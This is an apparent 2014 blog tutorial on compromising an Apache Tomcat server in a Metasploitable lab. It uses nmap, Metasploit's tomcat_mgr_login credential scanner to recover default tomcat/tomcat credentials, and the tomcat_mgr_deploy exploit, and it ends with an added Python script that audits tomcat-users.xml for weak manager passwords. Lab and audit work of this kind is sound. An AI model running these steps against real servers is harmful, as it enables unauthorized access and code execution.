Sunday 11 May 2014

How to Exploit an Apache Tomcat Server Using MSF

Hello Friends,
Today I am showing you how to exploit an Apache Tomcat machine.
The basic setup we require is:
1. VMware Workstation
2. Metasploitable (Download Here: http://sourceforge.net/projects/metasploitable/)
3. Kali Linux or BackTrack 5 R3
Steps
Start Metasploitable and Kali Linux in VMware Workstation and note their IP addresses.
Scan the Metasploitable IP from Kali Linux using the Nmap tool:
nmap -sV 192.168.230.133 (Metasploitable IP)
This lists all the services running on the target machine, along with their versions.
We found that "Apache Tomcat" is running on port 8180.
Now search for a related exploit.
In Kali Linux, start Metasploit and type "search tomcat":
msf > search tomcat
From the results, select the best exploit.
Here "exploit/multi/http/tomcat_mgr_deploy" is excellent,
so go with that one, but before using the exploit, learn about it.
To get information about the exploit:
msf > info exploit/multi/http/tomcat_mgr_deploy
For this exploit to run we need the USERNAME and PASSWORD of the Tomcat server, which we do not have.
So next, go back to msf once again:
msf > search tomcat
Here you have an auxiliary module that may help in getting the USERNAME and PASSWORD:
msf > info auxiliary/scanner/http/tomcat_mgr_login
msf > use auxiliary/scanner/http/tomcat_mgr_login

Then set RHOST and RPORT and type run (not exploit, because we are running an auxiliary module, not an exploit).
Now you will get the USERNAME and PASSWORD of Tomcat.
We got username = tomcat and password = tomcat.

After getting the username and password, use the exploit.
Now set all the options, such as RHOST.
Now type exploit.
That's it.
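
The login scanner above succeeded because the Tomcat manager account still had its password set to its own username (tomcat/tomcat). As an added example that is not part of the original post, this Python script audits a tomcat-users.xml file for accounts that hold a manager role and have a guessable password; the sample file, the weak-password list and the function name audit_tomcat_users are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Roles that grant access to the Tomcat manager application
# ("manager" on older releases, "manager-*" on Tomcat 7 and later).
MANAGER_ROLES = {"manager", "manager-gui", "manager-script",
                 "manager-jmx", "manager-status"}
# Constructed short list of guessable passwords, for illustration only.
WEAK_PASSWORDS = {"", "tomcat", "admin", "manager", "password"}

# Constructed sample tomcat-users.xml, modelled on the credentials found above.
SAMPLE_USERS_XML = """<tomcat-users>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager"/>
  <user username="deployer" password="Xk7#pQ2vLm9!tR4z" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="role1"/>
</tomcat-users>"""


def audit_tomcat_users(xml_text):
    """Return (username, reason) for each manager account with a guessable password."""
    findings = []
    root = ET.fromstring(xml_text)
    for user in root.iter():
        # Strip any XML namespace so plain and namespaced files are both handled.
        if user.tag.rsplit("}", 1)[-1] != "user":
            continue
        # Older files use the attribute "name" instead of "username".
        name = user.get("username") or user.get("name") or ""
        password = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        if not roles & MANAGER_ROLES:
            continue  # cannot reach the manager app, so out of scope here
        if password.lower() == name.lower():
            findings.append((name, "password equals username"))
        elif password.lower() in WEAK_PASSWORDS:
            findings.append((name, "password is in the weak-password list"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_tomcat_users(SAMPLE_USERS_XML):
        print(f"[!] manager account {name!r}: {reason}")
```

Any account the script reports should get a strong unique password or lose its manager role, and the manager application should not be reachable from untrusted networks.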

image by:-hdbdhacker

